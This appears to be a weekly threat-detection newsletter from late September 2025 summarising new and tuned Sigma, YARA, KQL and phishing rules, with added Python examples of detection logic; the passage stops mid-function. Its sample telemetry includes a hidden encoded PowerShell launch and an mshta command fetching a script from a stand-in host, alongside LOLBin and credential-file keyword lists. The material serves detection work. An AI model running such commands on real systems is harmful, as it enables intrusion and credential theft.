Detections Digest #20250929
This issue highlights key updates from 11 repos, including 42 new and 53 modified Elastic, YARA, Sigma, KQL and Sublime Security detection rules.
This week’s update highlights the most significant changes to detection rules from 11 of the 40+ monitored GitHub repositories. Between Sep 22 and Sep 29, 2025, contributors added 42 new rules and updated 53 existing ones.
Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.
Key Takeaways
Multiple repositories added detection for recent exploits. Rules target post-exploitation activity from the CrushFTP RCE (CVE-2025-54309) by monitoring for suspicious child processes of the CrushFTP service. Other rules detect the creation of .library-ms files, a technique for NTLM hash theft via CVE-2025-24054. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules)
New rules target defense evasion tactics across multiple projects. Detections identify the EDR-Freeze tool abusing WerFaultSecure.exe to suspend security processes. Other rules cover stealthy registry modification with wmic.exe and malicious WDAC policy creation to block security tools. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules)
There is a focus on Microsoft Entra ID and identity-based threats. KQL queries were added or tuned for suspicious MFA registration, activity from anonymous IPs, and Conditional Access policy bypasses. An Elastic rule was updated to detect ‘User Access Administrator’ role elevation in Entra ID. (elastic/detection-rules, benscha/KQLAdvancedHunting, ep3p/Sentinel_KQL, Sergio-Albea-Git/Threat-Hunting-KQL-Queries)
Phishing detections were updated to counter evasive methods. New rules analyze calendar invites (.ics files) for callback phishing and for recently registered sender domains. Other additions target SharePoint impersonation in email attachments through link analysis and OCR. (sublime-security/sublime-rules)
Coverage for command-and-control channels and specific malware was expanded. Detection logic for VS Code tunnels used as a C2 was broadened in Sigma rules. New YARA rules detect a variety of malware, including the PondRAT backdoor, Warlock ransomware, and the FlipSwitch rootkit. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules, reversinglabs/reversinglabs-yara-rules, elastic/protections-artifacts)
🚀 Make updates from this digest operational → All detection rules from this digest are available in our MISP and STIX/TAXII feeds ready for direct integration into your SIEM, TIP, or SOAR solution, boosting your automated threat detection and enriching your existing intel.
Table Of Contents
SigmaHQ/sigma (+11, ✎8)
reversinglabs/reversinglabs-yara-rules (+2)
elastic/detection-rules (+1, ✎3)
Yamato-Security/hayabusa-rules (+17, ✎13)
sublime-security/sublime-rules (+5, ✎11)
elastic/protections-artifacts (+1, ✎6)
benscha/KQLAdvancedHunting (✎1)
ep3p/Sentinel_KQL (+2, ✎4)
Sergio-Albea-Git/Threat-Hunting-KQL-Queries (+2)
bartblaze/Yara-rules (+1, ✎4)
Neo23x0/signature-base (✎3)
Corporate repositories (6)
SigmaHQ/sigma (+11, ✎8)
+ New rules
Multiple new rules detect defense evasion techniques. These include the EDR-Freeze tool’s abuse of WerFaultSecure.exe to suspend security processes, use of wmic.exe with StdRegProv for stealthy registry modification, and the creation of malicious Windows Defender Application Control (WDAC) policies to block security software. (WDAC Policy File Creation In CodeIntegrity Folder, Registry Manipulation via WMI Stdregprov, Suspicious Process Suspension via WERFaultSecure through EDR-Freeze)
New detections target the abuse of legitimate administrative and security tools for malicious control. One rule identifies the command-line registration of a TacticalRMM agent, indicating a compromised host connecting to an unauthorized C2 server. Another detects the Velociraptor DFIR tool spawning suspicious child processes to download and execute remote payloads. (Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server, Suspicious Velociraptor Child Process)
Two rules detect activity related to specific CVEs. One identifies likely post-exploitation of the CrushFTP RCE (CVE-2025-54309) by monitoring for crushftp.exe spawning suspicious child processes such as cmd.exe; process telemetry sees the result of exploitation rather than the exploit request itself, so the rule fires after a successful attack, not on the attempt. The other detects creation of .library-ms files by archive utilities, a technique used to leak NTLMv2 hashes to an attacker-controlled server via CVE-2025-24054. (Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309), Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit)
Detections for specific malware families were added. One rule identifies FunkLocker ransomware by the creation of files with the .funksec extension. Another targets ClickFix malware by monitoring for malicious HTTP links written to the RunMRU registry key. (FunkLocker Ransomware File Creation, Potential ClickFix Execution Pattern - Registry)
New rules cover common C2 and credential access methods. One rule detects DNS queries to low-reputation top-level domains, often used for C2 infrastructure. Another detects direct access to the PowerShell console history file (ConsoleHost_history.txt) to find sensitive information. (Low Reputation Effective Top-Level Domain (eTLD), Potential PowerShell Console History Access Attempt via History File)
✎ Modified rules
Detection for Visual Studio Code tunnels used as a C2 channel is broadened across two rules. The logic no longer requires the ‘--name’ argument, increasing coverage for renamed or default tunnel configurations. Both rules are now mapped to MITRE ATT&CK T1219 for remote access software. (Visual Studio Code Tunnel Execution, Renamed Visual Studio Code Tunnel Execution)
Several rules detecting persistence and remote execution were tuned to reduce false positives. Exclusions were added for the Notepad++ installer writing plugin DLLs, the Dropbox client creating services with sc.exe, and PsExec-like activity targeting the local machine. (Potential PsExec Remote Execution, Potential Persistence Via Notepad++ Plugins, New Service Creation Using Sc.EXE)
Coverage for defense evasion techniques was expanded. One rule adds detection for .log and .rtf files used with regsvr32.exe to execute disguised DLLs. Another adds ‘PowerShell_ISE.EXE’ and ‘wmic.exe’ to the list of tools monitored for disabling or deleting Windows services. (Regsvr32 DLL Execution With Suspicious File Extension, Suspicious Windows Service Tampering)
Detection for the Windows Kerberos privilege escalation vulnerability CVE-2022-37966 was updated. The rule now includes an alternative event provider name, improving compatibility for identifying RC4-HMAC encryption downgrades across different logging configurations. (KDC RC4-HMAC Downgrade CVE-2022-37966)
reversinglabs/reversinglabs-yara-rules (+2)
+ New rules
Two new YARA rules detect specific malware. One identifies the PondRAT backdoor on Linux by matching hexadecimal patterns in ELF binaries. The other detects Warlock ransomware on Windows by finding its characteristic patterns for encryption and system manipulation in PE files. (Linux_Backdoor_PondRAT, Win64_Ransomware_Warlock)
elastic/detection-rules (+1, ✎3)
+ New rules
A new rule detects the Node.js runtime spawning a shell to execute the GitHub CLI command ‘gh auth token’. This targets an adversary technique for stealing GitHub authentication tokens, a behavior observed in the Shai-Hulud worm campaign. (GitHub Authentication Token Access via Node.js)
✎ Modified rules
Detection for the RemoteMonologue session hijacking technique, which modifies COM object RunAs registry values, was made more reliable. The EQL query now treats the user.id field as optional, preventing query failures and reducing potential missed detections when the field is absent. (Potential RemoteMonologue Attack)
Coverage for Microsoft Entra ID privilege escalation was improved. The rule now includes an additional condition to detect ‘User Access Administrator’ role elevation. The rule’s severity was raised to high, and the lookback window was shortened to 7 days so that the rule focuses on recent elevation activity. (Microsoft Entra ID Elevated Access to User Access Administrator)
Accuracy for detecting stealthy PowerShell execution via DLL loading was improved by adding exceptions for legitimate software from PDQ.com, Dell, and Chocolatey. Detection coverage was also expanded by removing rundll32.exe from an exclusion list, enabling the rule to fire on this process. (Suspicious PowerShell Engine ImageLoad)
Yamato-Security/hayabusa-rules (+17, ✎13)
+ New rules
New rules detect post-exploitation activity following a CrushFTP RCE (CVE-2025-54309). Detections monitor for crushftp.exe spawning suspicious child processes such as PowerShell with encoded commands, command prompt for discovery, and various living-off-the-land binaries. (Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309), Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309))
Multiple rules target defense evasion techniques. Detections identify registry modification using wmic.exe, the abuse of WerFaultSecure.exe to suspend security processes (EDR-Freeze tool), and the creation of malicious Windows Defender Application Control policies to block security software. (Registry Manipulation via WMI Stdregprov, Registry Manipulation via WMI Stdregprov, WDAC Policy File Creation In CodeIntegrity Folder, Suspicious Process Suspension via WERFaultSecure through EDR-Freeze, Suspicious Process Suspension via WERFaultSecure through EDR-Freeze)
Detection coverage is added for the abuse of legitimate administration and DFIR tools. New rules identify the command-line installation of the TacticalRMM agent and monitor for the Velociraptor tool spawning child processes like code.exe for tunneling or msiexec.exe for remote installations. (Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server, Suspicious Velociraptor Child Process, Suspicious Velociraptor Child Process, Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server)
New rules detect specific malware families. One set targets ClickFix malware by identifying HTTP links written to the RunMRU registry key. Another rule detects FunkLocker ransomware by monitoring Sysmon events for the creation of files with the .funksec extension. (Potential ClickFix Execution Pattern - Registry, FunkLocker Ransomware File Creation, Potential ClickFix Execution Pattern - Registry)
New detections target information gathering and exploitation. Two rules identify attempts to access the PowerShell ConsoleHost_history.txt file for reconnaissance. Another rule detects the creation of .library-ms files, indicating an attempt to exploit CVE-2025-24054 for NTLM hash theft. (Potential PowerShell Console History Access Attempt via History File, Potential PowerShell Console History Access Attempt via History File, Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit)
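As an added example (not code from SigmaHQ/sigma, Yamato-Security/hayabusa-rules or this digest), the selection logic of the CrushFTP child-process, ClickFix RunMRU and console-history rules summarised here and in the SigmaHQ/sigma section above, re-expressed in Python with Sigma-style case-insensitive contains/endswith matching and run over constructed Sysmon-shaped events. Field names follow Sysmon EventID 1 (process creation) and EventID 13 (registry value set); the child-process list, the exact conditions and the sample events are assumptions drawn from the digest's descriptions, not the published rule bodies.

```python
# Added example: Sigma-style selections for three rules from this digest, run
# over constructed Sysmon-shaped events. Conditions are assumptions based on the
# digest text, not the published SigmaHQ/hayabusa rule bodies.

def _field(ev, name):
    """Sigma string matching is case-insensitive, so normalise once."""
    return str(ev.get(name, "")).lower()


def ends_with_any(ev, name, suffixes):
    value = _field(ev, name)
    return any(value.endswith(s.lower()) for s in suffixes)


def contains_any(ev, name, needles):
    value = _field(ev, name)
    return any(n.lower() in value for n in needles)


# Assumed child-process list: shells, script hosts and LOLBins a web-facing
# service such as CrushFTP has no business spawning.
SUSPICIOUS_CHILDREN = [
    "\\cmd.exe", "\\powershell.exe", "\\pwsh.exe", "\\mshta.exe",
    "\\certutil.exe", "\\rundll32.exe", "\\regsvr32.exe", "\\wscript.exe",
    "\\cscript.exe", "\\bitsadmin.exe", "\\curl.exe",
]


def rule_crushftp_rce(ev):
    """crushftp.exe spawning a shell/LOLBin: post-exploitation of CVE-2025-54309."""
    return (ev.get("EventID") == 1
            and ends_with_any(ev, "ParentImage", ["\\crushftp.exe"])
            and ends_with_any(ev, "Image", SUSPICIOUS_CHILDREN))


def rule_clickfix_runmru(ev):
    """Win+R history (RunMRU) value containing a URL: ClickFix-style paste-and-run."""
    return (ev.get("EventID") == 13
            and contains_any(ev, "TargetObject", ["\\Explorer\\RunMRU\\"])
            and contains_any(ev, "Details", ["http://", "https://"]))


def rule_console_history(ev):
    """Any process naming the PSReadLine history file on its command line."""
    return (ev.get("EventID") == 1
            and contains_any(ev, "CommandLine", ["consolehost_history.txt"]))


RULES = {
    "Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309)": rule_crushftp_rce,
    "Potential ClickFix Execution Pattern - Registry": rule_clickfix_runmru,
    "Potential PowerShell Console History Access Attempt via History File": rule_console_history,
}


def evaluate(events):
    """Return (event index, rule title) for every rule that fires on each event."""
    return [(i, title) for i, ev in enumerate(events)
            for title, rule in RULES.items() if rule(ev)]


# Constructed sample telemetry (not real events); paths are illustrative.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": "C:\\Program Files\\CrushFTP11\\crushftp.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 1, "ParentImage": "C:\\Program Files\\CrushFTP11\\crushftp.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAC4ALgAuACkA"},
    {"EventID": 1, "ParentImage": "C:\\Program Files\\CrushFTP11\\crushftp.exe",
     "Image": "C:\\Program Files\\Java\\bin\\java.exe",        # benign JVM helper, no hit
     "CommandLine": "java.exe -version"},
    {"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe C:\\Users\\bob\\AppData\\Roaming\\Microsoft\\Windows\\"
                    "PowerShell\\PSReadLine\\ConsoleHost_history.txt"},
    {"EventID": 13, "TargetObject": "HKU\\S-1-5-21-1-2-3-1001\\SOFTWARE\\Microsoft\\Windows\\"
                                    "CurrentVersion\\Explorer\\RunMRU\\a",
     "Details": "mshta https://captcha-check.example/verify.hta\\1"},
    {"EventID": 13, "TargetObject": "HKU\\S-1-5-21-1-2-3-1001\\SOFTWARE\\Microsoft\\Windows\\"
                                    "CurrentVersion\\Explorer\\RunMRU\\b",
     "Details": "calc\\1"},                                    # benign Win+R entry, no hit
]

if __name__ == "__main__":
    for index, title in evaluate(SAMPLE_EVENTS):
        print(f"event {index}: {title}")
```

Run as a script it prints four hits (events 0, 1, 3 and 4); the java.exe child and the benign RunMRU entry stay quiet. The point worth keeping when porting this to a real pipeline is the parent/child pairing in the CrushFTP rule: matching on the child alone would page on every interactive cmd.exe.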
✎ Modified rules
Detection for Visual Studio Code remote tunnel abuse, used for C2 (T1219), was broadened across four rules. The logic no longer requires the ‘--name’ argument, covering more execution variants of this remote access software technique. (Visual Studio Code Tunnel Execution, Renamed Visual Studio Code Tunnel Execution, Visual Studio Code Tunnel Execution, Renamed Visual Studio Code Tunnel Execution)
Rules for detecting Windows service manipulation were improved. Detections for tampering with existing services now include wmic.exe and WMI .delete() methods. Additionally, rules for new service creation using sc.exe were refined to filter legitimate activity from the Dropbox client. (New Service Creation Using Sc.EXE, Suspicious Windows Service Tampering, New Service Creation Using Sc.EXE, Suspicious Windows Service Tampering)
Two rules detecting remote execution with PsExec-like tools were tuned to reduce false positives. Both now filter out command-line executions targeting the local machine via localhost or loopback IP addresses. (Potential PsExec Remote Execution, Potential PsExec Remote Execution)
Coverage for Kerberos-based attacks was expanded. Rules detecting Kerberoasting (T1558.003) and a privilege escalation vulnerability (CVE-2022-37966) were updated to monitor an additional event provider name, increasing compatibility across Windows versions. (KDC RC4-HMAC Downgrade CVE-2022-37966, No Suitable Encryption Key Found For Generating Kerberos Ticket)
The rule detecting persistence via Notepad++ plugin DLLs was refined. The logic now filters out common DLLs created by the official Notepad++ installer, reducing false positives from standard software installation. (Potential Persistence Via Notepad++ Plugins)
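The two tuning changes summarised above (also mirrored in the SigmaHQ/sigma modified rules), as an added example that is not code from either repository: an assumed before/after for the Visual Studio Code tunnel selection, and a PsExec-style selection with the new local-target exclusion. The "before" conditions (tunnel plus an explicit --name; -accepteula plus a \\target token) are assumptions standing in for the real rule bodies, and the command lines are constructed.

```python
import ipaddress
import re

# Added example; the "before" selections are assumptions, not the real rule bodies.

def _is_code(image):
    return image.lower().endswith("\\code.exe")


def vscode_tunnel_before(image, cmdline):
    """Assumed old logic: code.exe, 'tunnel' AND an explicit '--name'."""
    cl = cmdline.lower()
    return _is_code(image) and "tunnel" in cl and "--name" in cl


def vscode_tunnel_after(image, cmdline):
    """Broadened logic: any code.exe tunnel sub-command, named or not."""
    return _is_code(image) and re.search(r"(?:^|\s)tunnel(?:\s|$)", cmdline.lower()) is not None


TARGET_RE = re.compile(r"\\\\([A-Za-z0-9._:\-]+)")   # \\host or \\ip given to a PsExec-style tool


def _is_local_target(host):
    """localhost, 127.0.0.0/8 and ::1 all mean 'this machine'."""
    if host.lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False


def psexec_like_before(cmdline):
    """Assumed old logic: -accepteula together with a \\target token."""
    return "-accepteula" in cmdline.lower() and TARGET_RE.search(cmdline) is not None


def psexec_like_after(cmdline):
    """Tuned logic: same selection, minus executions aimed only at the local machine."""
    if not psexec_like_before(cmdline):
        return False
    targets = TARGET_RE.findall(cmdline)
    return not all(_is_local_target(t) for t in targets)


# Constructed command lines (not real telemetry).
CODE_EXE = "C:\\Users\\a\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
TUNNEL_SAMPLES = [
    (CODE_EXE, "code.exe tunnel --name dev-box"),
    (CODE_EXE, "code.exe tunnel --accept-server-license-terms"),   # missed before, caught now
    (CODE_EXE, "code.exe --version"),
]
PSEXEC_SAMPLES = [
    "psexec.exe \\\\192.0.2.10 -accepteula -s cmd.exe",            # remote target: still alerts
    "paexec.exe \\\\127.0.0.1 -accepteula -s cmd.exe",             # local: excluded now
    "PsExec64.exe \\\\localhost -accepteula -i cmd.exe",
    "psexec.exe \\\\::1 -accepteula cmd.exe",
]


def compare():
    """(before, after) verdict per sample, to show what the retuning changed."""
    tunnels = [(vscode_tunnel_before(i, c), vscode_tunnel_after(i, c)) for i, c in TUNNEL_SAMPLES]
    psexec = [(psexec_like_before(c), psexec_like_after(c)) for c in PSEXEC_SAMPLES]
    return tunnels, psexec
```

The local-target exclusion uses `ipaddress` rather than a string list so that `127.0.0.1`, `127.1.2.3` and `::1` are all treated the same way; a PsExec run against the local machine is what admin tooling and some installers do, and is not lateral movement.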
sublime-security/sublime-rules (+5, ✎11)
+ New rules
New rules were added to detect phishing attacks that impersonate Microsoft SharePoint. Detections identify malicious links inside EML attachments by analyzing SharePoint subdomains for known malicious patterns or sender-subdomain mismatches. Another rule uses OCR and NLU to find credential theft language in PDF attachments that mimic SharePoint. (Attachment: EML with SharePoint files shared from GoDaddy federated tenants, Attachment: EML with Sharepoint link likely unrelated to sender, Brand impersonation: SharePoint PDF attachment with credential theft language)
Two rules now target evasive phishing tactics. One detects HTML obfuscation by identifying when a recipient’s domain is repeated in HTML class attributes. The other rule detects suspicious calendar invites (.ics files) that originate from domains registered within the last 90 days. (Body HTML: Recipient SLD in HTML class, Attachment: Calendar invite from recently registered domain)
✎ Modified rules
Detection for malicious calendar invites (.ics) is now more robust. Updates replace unreliable regex and string searches with structured ICS parsing to find callback phishing language and non-standard invites missing a UID field. Performance for detecting HTML smuggling in invites is also improved. (Callback phishing via calendar invite, Attachment: HTML smuggling with eval and atob via calendar invite, Non-RFC compliant calendar files from unsolicited sender)
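The structured-parsing approach described above, as an added example (not code from sublime-security/sublime-rules): a minimal RFC 5545 line unfolder and VEVENT parser, a check for the UID property the RFC requires per event, and a callback-phishing heuristic that looks for a phone number together with billing/cancellation language. The keyword list and phone pattern are assumptions, and both .ics samples are constructed.

```python
import re

# Added example: structured .ics parsing instead of regex over the raw body.
# Keyword list and phone pattern are assumptions, not Sublime's rule logic.

def unfold(ics_text):
    """Undo RFC 5545 line folding: a line starting with SPACE/TAB continues the previous one."""
    out = []
    for line in ics_text.replace("\r\n", "\n").split("\n"):
        if line[:1] in (" ", "\t") and out:
            out[-1] += line[1:]
        else:
            out.append(line)
    return out


def parse_vevents(ics_text):
    """Return one dict per VEVENT, keyed by property name with parameters stripped."""
    events, current = [], None
    for line in unfold(ics_text):
        if line == "BEGIN:VEVENT":
            current = {}
        elif line == "END:VEVENT":
            if current is not None:
                events.append(current)
            current = None
        elif current is not None and ":" in line:
            name, value = line.split(":", 1)
            name = name.split(";", 1)[0].upper()          # DTSTART;TZID=... -> DTSTART
            current[name] = value.replace("\\n", "\n").replace("\\,", ",")
    return events


PHONE_RE = re.compile(r"(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}\b")
CALLBACK_TERMS = ("call", "cancel", "charged", "invoice", "subscription",
                  "renew", "refund", "support")


def assess(ics_text):
    """Findings per invite: missing UID (non-RFC invite) and callback-phishing language."""
    findings = []
    for ev in parse_vevents(ics_text):
        text = " ".join(ev.get(k, "") for k in ("SUMMARY", "DESCRIPTION", "LOCATION")).lower()
        if "UID" not in ev:
            findings.append("missing UID (RFC 5545 requires one per VEVENT)")
        term_hits = sum(term in text for term in CALLBACK_TERMS)
        if PHONE_RE.search(text) and term_hits >= 2:
            findings.append(f"callback phishing language ({term_hits} terms) with phone number")
    return findings


# Constructed samples. The phishing invite folds its DESCRIPTION across three
# lines, which is exactly what defeats a naive regex over the raw attachment.
PHISH_ICS = "\r\n".join([
    "BEGIN:VCALENDAR", "VERSION:2.0", "PRODID:-//constructed sample//EN",
    "BEGIN:VEVENT",
    "DTSTART;TZID=America/New_York:20250929T100000",
    "DTEND;TZID=America/New_York:20250929T103000",
    "SUMMARY:Your PC Protect subscription has been renewed",
    "DESCRIPTION:Your account was charged $399.99. To cancel this subscription",
    "  and request a refund\\, call our support desk at 1-800-555-0199 within",
    "  24 hours.",
    "END:VEVENT", "END:VCALENDAR",
])
LEGIT_ICS = "\r\n".join([
    "BEGIN:VCALENDAR", "VERSION:2.0", "PRODID:-//constructed sample//EN",
    "BEGIN:VEVENT",
    "UID:20250929T120000Z-4711@calendar.example",
    "DTSTART:20250929T140000Z", "DTEND:20250929T143000Z",
    "SUMMARY:Weekly sync",
    "DESCRIPTION:Agenda: roadmap review.",
    "LOCATION:Room 4B",
    "END:VEVENT", "END:VCALENDAR",
])
```

Unfolding first matters: the phone number and the word "call" sit on different physical lines in the phishing sample, so a line-oriented regex never sees them together, while the parsed DESCRIPTION does.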
Multiple phishing rules were tuned to reduce false positives and add specific coverage. Exclusions were added for voicemail (CheckPoint notifications), quarantine (financial comms), and SharePoint link (own tenant) phishing detections. Coverage was expanded for Wix brand impersonation and SharePoint link display text abuse. (Fake voicemail notification (untrusted sender), Fake email quarantine notification, Brand impersonation: Wix, Link: SharePoint filename matches org name)
Detection for callback phishing was improved across multiple vectors. The rule for text-based file attachments now uses more resilient keyword matching and covers Excel files. The OCR-based rule for image attachments was tuned to reduce false positives by excluding email replies. (Attachment: Callback phishing solicitation via text-based file, Attachment: Callback phishing solicitation via image file)
Updates refine detection for phishing that abuses trusted services or uses encrypted attachments. The rule for Zoom Events abuse now relies more on NLU analysis and has broader sender authentication checks. The rule for credential theft via encrypted PDFs better targets initial access by excluding replies and checking for undisclosed recipients. (Zoom Events newsletter abuse, Attachment: Encrypted PDF with credential theft body)
elastic/protections-artifacts (+1, ✎6)
+ New rules
A new YARA rule detects the FlipSwitch rootkit proof-of-concept on Linux. The rule scans x86 files and memory for hexadecimal patterns found in the rootkit’s code. (Linux_Rootkit_Flipswitch_821f3c9e)
✎ Modified rules
Updated YARA rules improve detection of Linux malware. One rule targets Conti ransomware by identifying specific strings like ‘--vmkiller’ and the ‘.conti’ file extension. A second rule detects the Xmrig cryptominer by matching multiple, distinct hexadecimal byte sequences found in its binary code. (Linux_Ransomware_Conti_a89c26cf, Linux_Cryptominer_Xmrig_77fbc695)
Personal repositories (5)
benscha/KQLAdvancedHunting (✎1)
✎ Modified rules
The KQL query for suspicious Azure AD MFA registration was modified to reduce alert volume. The logic now excludes a defined internal IP range and de-duplicates alerts to show only the earliest anomalous registration event per actor. (Suspicious_MFA_Registration)
ep3p/Sentinel_KQL (+2, ✎4)
+ New rules
A new KQL query tracks device account deletions and disablements across both on-premises Active Directory and Microsoft Entra ID. It correlates Windows Security Events (4725, 5136) with Entra ID audit logs to create a consolidated timeline of device removals. (removed device events)
A new KQL query detects user activity from anonymous IP addresses flagged by Microsoft Defender for Cloud Apps. It joins AADUserRiskEvents with SecurityAlert and sign-in logs to give a correlated view of authentications from anonymizing services. (Multiple-Activity from anonymous IP addresses)
✎ Modified rules
Three KQL queries for detecting suspicious Azure AD activity were rewritten to improve their core logic. They now query the AADUserRiskEvents table directly for events like new country sign-ins, suspicious inbox forwarding, and inbox manipulation rules. This replaces the previous method of starting from the SecurityAlert table, resulting in more direct detection of identity risks. (Multiple-Activity from infrequent country, Multiple-Suspicious inbox forwarding rule, Multiple-Suspicious inbox manipulation rule)
Detection of unusual remote sessions on domain controllers is refined to reduce false positives. The rule now filters out activity from known Privileged Access Management (PAM) system IP addresses by dynamically populating an exclusion list from a watchlist, separating legitimate administrative actions from potential threats. (SecurityEvent-Possible unusual remote session in a domain controller)
Sergio-Albea-Git/Threat-Hunting-KQL-Queries (+2)
+ New rules
A new KQL query detects outbound SMB or NTLM negotiation with external, non-private IP addresses. This rule identifies potential data exfiltration or credential relay attacks by inspecting traffic on both standard and non-standard ports for SMB/NTLM signatures. (SMB & NTLM Negotiation to Unknown Remote IPs)
A new KQL query detects a potential bypass of Microsoft Entra Conditional Access policies. The detection identifies when a user with assigned roles initiates a private browsing session on a device with an existing trusted session, a method to circumvent device-based checks. (Detecting potential CA policy bypass by privileged accounts via private browser sessions)
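The SMB/NTLM-to-external-IP logic summarised above, as an added example in Python rather than KQL (not code from the repository): classify constructed outbound connections by destination range and by protocol signature in the first payload bytes, regardless of port. The signatures are the standard ones (SMB1 `\xFFSMB`, SMB2/3 `\xFESMB`, raw `NTLMSSP\0`, and the Base64 prefix `TlRMTVNTUAAB` that an NTLM Type 1 message produces inside an HTTP Authorization header); the internal-range list, field names and sample events are assumptions.

```python
import ipaddress

# Added example, not the repository's KQL. Sample events are constructed.

# Ranges treated as "internal". ipaddress.ip_address(...).is_private is deliberately
# NOT used: it also returns True for the RFC 5737 documentation ranges
# (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), which stand in for Internet
# addresses below, so it would silently hide the very events we want to see.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "100.64.0.0/10",
    "127.0.0.0/8", "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]

SIGNATURES = {
    "smb1": b"\xffSMB",
    "smb2": b"\xfeSMB",
    "ntlmssp": b"NTLMSSP\x00",
    "ntlm_http": b"NTLM TlRMTVNTUAAB",   # Base64 of "NTLMSSP\0\x01": a Type 1 message in an HTTP header
}


def is_external(ip_text):
    addr = ipaddress.ip_address(ip_text)
    return not any(addr in net for net in INTERNAL_NETS)


def protocol_signature(payload):
    """Name of the first SMB/NTLM signature found in the leading bytes, else None."""
    head = payload[:512]
    for name, sig in SIGNATURES.items():
        if sig in head:
            return name
    return None


def detect(events):
    """Outbound SMB/NTLM negotiation with an external address, on any port."""
    hits = []
    for ev in events:
        sig = protocol_signature(ev["payload"])
        if sig and is_external(ev["remote_ip"]):
            hits.append((ev["process"], ev["remote_ip"], ev["remote_port"], sig))
    return hits


SAMPLE_EVENTS = [
    {"process": "explorer.exe", "remote_ip": "10.0.0.5", "remote_port": 445,
     "payload": b"\x00\x00\x00\x68\xfeSMB\x40\x00"},                  # internal file server
    {"process": "explorer.exe", "remote_ip": "203.0.113.7", "remote_port": 445,
     "payload": b"\x00\x00\x00\x68\xfeSMB\x40\x00"},                  # SMB2 straight to the Internet
    {"process": "svchost.exe", "remote_ip": "198.51.100.9", "remote_port": 8445,
     "payload": b"\x00\x00\x00\x2f\xffSMBr\x00\x00\x00\x00"},         # SMB1 on a non-standard port
    {"process": "chrome.exe", "remote_ip": "198.51.100.20", "remote_port": 8080,
     "payload": b"GET /share HTTP/1.1\r\nAuthorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAA\r\n\r\n"},
    {"process": "chrome.exe", "remote_ip": "203.0.113.8", "remote_port": 443,
     "payload": b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03"},      # TLS ClientHello, no hit
    {"process": "explorer.exe", "remote_ip": "fd00::1", "remote_port": 445,
     "payload": b"\x00\x00\x00\x68\xfeSMB\x40\x00"},                  # internal IPv6 ULA
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Keying on payload signatures rather than on port 445 is what catches the second and third hits: an attacker relaying credentials, or a lure pointing at `\\host@8445\share`, will not use the port a firewall rule expects.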
bartblaze/Yara-rules (+1, ✎4)
+ New rules
A new YARA rule detects a backdoored version of the libcef.dll file reportedly used by an APT actor. Detection is based on the presence of specific strings within the file that indicate command-and-control capabilities, such as error messages for failing to list processes or create a pipe. (Libcef_Backdoor)
✎ Modified rules
A set of four YARA rules for malicious Windows Shortcut (LNK) files was updated. One rule identifies LNK files by their header bytes (magic) and acts as the base for the others. The remaining rules look for embedded PowerShell commands, scripting artifacts such as JScript and VBScript, and executable content, matching on specific keywords, script engine names, and Base64-encoded MZ headers. (isLNK, PS_in_LNK, Script_in_LNK, EXE_in_LNK)
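As an added example (not code from bartblaze/Yara-rules), the same layered idea in Python: recognise an LNK by its header bytes, then look for PowerShell and script-engine keywords and for a Base64-encoded MZ header. Two details matter in practice and are shown here: LNK string data is usually UTF-16LE, so ASCII-only keywords miss it, and a Base64 payload can sit at any of three byte alignments, so a single "TVqQ" string catches only one of them. The 8-byte header constant comes from the Shell Link format (HeaderSize 0x4C plus the start of the LinkCLSID); the keyword lists and the LNK-like buffer are constructed assumptions.

```python
import base64
import math

# Added example, not the repository's rules. LNK header: HeaderSize 0x0000004C
# followed by the first bytes of LinkCLSID 00021401-0000-0000-C000-000000000046.
LNK_MAGIC = b"\x4c\x00\x00\x00\x01\x14\x02\x00"

PS_KEYWORDS = [b"powershell", b"pwsh", b"-enc", b"-encodedcommand", b"invoke-expression"]
SCRIPT_KEYWORDS = [b"wscript", b"cscript", b"mshta", b"jscript", b"vbscript", b".js", b".vbs"]


def base64_variants(needle):
    """Base64 text that encodes `needle` at each of the three 3-byte alignments.

    Prepending k filler bytes shifts the alignment; characters whose 6-bit groups
    overlap the filler or the trailing padding are trimmed, so only bytes of
    `needle` determine what remains.
    """
    variants = []
    for k in range(3):
        encoded = base64.b64encode(b"\x00" * k + needle).decode("ascii")
        start = math.ceil(8 * k / 6)                 # first char not touched by filler
        end = (8 * (k + len(needle))) // 6           # last char fully inside needle
        variants.append(encoded[start:end])
    return variants


# Three search strings for a DOS header "MZ\x90\x00\x03\x00\x00\x00" at any alignment.
MZ_B64 = [v.encode("ascii") for v in base64_variants(b"MZ\x90\x00\x03\x00\x00\x00")]


def _contains_any(data, needles, case_insensitive=True):
    """Search raw bytes and their UTF-16LE form (LNK StringData is UTF-16LE)."""
    hay = data.lower() if case_insensitive else data
    for n in needles:
        n = n.lower() if case_insensitive else n
        if n in hay or n.decode("ascii").encode("utf-16-le") in hay:
            return True
    return False


def is_lnk(data):
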